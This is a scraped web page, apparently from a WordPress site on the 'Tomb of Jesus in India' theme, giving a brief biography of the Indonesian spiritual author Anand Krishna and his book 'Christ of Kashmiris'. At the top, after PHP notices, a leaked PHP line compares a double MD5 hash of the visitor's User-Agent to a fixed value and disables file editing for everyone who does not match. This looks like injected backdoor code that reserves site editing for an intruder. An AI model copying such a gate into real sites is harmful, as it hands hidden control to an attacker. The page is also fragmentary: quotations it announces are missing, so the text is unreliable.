Notice: Constant FS_CHMOD_DIR already defined in /home/akramkhalid/public_html/ on line 113

Notice: Constant FS_CHMOD_FILE already defined in /home/akramkhalid/public_html/ on line 113
if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Anand Krishna – Tomb of Jesus in India

Anand Krishna

Anand Krishna

Anand Krishna is a spiritual leader and author from Indonesia. His main influence and publicity has been around the area of meditation and also interfaith spirituality.Sufi Mystic, and leading Jesus in India expert, Dr Fida Hassnain, describes him in the following words:

Dr Hassnain has written the introduction to Anand Krishna’s book ‘Christ of Kashmiris’ and he also mentioned in particular Anand Krishna’s universial view of religions:

He has written many books and has also set up the Anand Krishna Education Foundation and Anand Krishna Global Co-Operation.

Christ of Kashmiris

He has recently written a text entitled ‘Christ of Kashmiris’.

Anand Krisnha’s Journey to Kashmir and Leh

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